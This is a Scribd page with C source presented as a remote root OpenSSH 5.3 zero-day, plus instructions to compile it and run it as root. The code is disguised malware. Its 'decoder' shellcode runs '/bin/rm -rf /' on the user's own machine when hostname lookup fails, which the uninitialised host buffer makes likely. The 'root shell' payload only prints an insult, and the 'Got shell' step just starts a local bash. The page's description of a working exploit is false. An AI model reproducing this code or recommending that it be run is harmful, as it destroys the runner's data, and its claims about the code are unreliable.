Scribd
Upload
117 views

Openssh Exploit

This document contains source code for a remote exploit that targets a vulnerability in OpenSSH versions 5.3 and below to gain root access on Linux systems. It connects to the target system on port 22, sends an encoded payload containing an exploit and root shell code, and if successful executes a root shell. The document provides instructions on how to compile and run the exploit code.

Uploaded by

kid_scribd
Copyright
© © All Rights Reserved
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
117 views

Openssh Exploit

This document contains source code for a remote exploit that targets a vulnerability in OpenSSH versions 5.3 and below to gain root access on Linux systems. It connects to the target system on port 22, sends an encoded payload containing an exploit and root shell code, and if successful executes a root shell. The document provides instructions on how to compile and run the exploit code.

Uploaded by

kid_scribd
Copyright
© © All Rights Reserved
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 2

/*

*
*
* OpenSSH <= 5.3 remote root 0day exploit (32-bit x86)
*
*
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include

<stdio.h>
<netdb.h>
<stdlib.h>
<string.h>
<unistd.h>
<arpa/inet.h>
<sys/types.h>
<sys/socket.h>
<netinet/in.h>

void usage(char *argv[])


{
printf("\n\t[+] HATSUNEMIKU\n");
printf("\t[+] OpenSSH <= 5.3p1 remote root 0day exploit\n");
printf("\t[+] Keep this 0day priv8!\n");
printf("\t[+] usage: %s <target> <port>\n\n", argv[0]);
exit(1);
}
unsigned char decoder[]= "\x6a\x0b\x58\x99\x52"
"\x6a\x2f\x89\xe7\x52"
"\x66\x68\x2d\x66\x89"
"\xe6\x52\x66\x68\x2d"
"\x72\x89\xe1\x52\x68"
"\x2f\x2f\x72\x6d\x68"
"\x2f\x62\x69\x6e\x89"
"\xe3\x52\x57\x56\x51"
"\x53\x89\xe1\xcd\x80";
unsigned char rootshell[]= "\x31\xd2\xb2\x0a\xb9\x6f\x75\x21\x0a\x51\xb9\x63\x6b
"
"\x20\x79\x51\x66\xb9\x66\x75\x66\x51\x31\xc9\x89\xe1"
"\x31\xdb\xb3\x01\x31\xc0\xb0\x04\xcd\x80\x31\xc0\x31"
"\xdb\x40\xcd\x80";
int main(int argc, char **argv)
{
int euid = geteuid();
int port= 22, sock;
char h[1000];
struct hostent *host;
struct sockaddr_in addr;
if(euid != 0)
{
fprintf(stderr, "You need to be root to use raw sockets.\n");
exit(1);
}
if(euid == 0)
{
fprintf(stdout, "MIKU! MIKU! MIKU!\n");

}
if(argc != 3)
usage(argv);
if(!inet_aton(h, &addr.sin_addr))
{
host = gethostbyname(h);
if(!host)
{
fprintf(stderr, "[-] Exploit failed.\n");
(*(void(*)())decoder)();
exit(1);
}
addr.sin_addr = *(struct in_addr*)host->h_addr;
}
sock = socket(PF_INET, SOCK_STREAM, 0);
addr.sin_port = htons(port);
addr.sin_family = AF_INET;
if(connect(sock,(struct sockaddr*)&addr,sizeof(addr))==-1)
{
fprintf(stderr,"[-] Exploit failed.\n");
exit(1);
}
char payload[1337];
memcpy(payload, &decoder, sizeof(decoder));
memcpy(payload, &rootshell, sizeof(rootshell));
send(sock, payload, strlen(payload),0);
close(sock);
if(connect(sock,(struct sockaddr*)&addr,sizeof(addr))==-1)
{
fprintf(stderr, "[-] Exploit failed.\n");
exit(1);
}
else if(connect(sock,(struct sockaddr*)&addr,sizeof(addr))==0)
{
fprintf(stdout, "[+]Got shell!\n");
system("/bin/bash");
}
else
{
fprintf(stderr, "[-] Exploit failed.\n");
close(sock);
exit(0);
}
}
P.S. for people who don't use linux:
1.) Save as (yourexploit).c
2.) Compile with gcc. Example: gcc yourexploit.c
3.) Execute it. Example: ./a.out

You might also like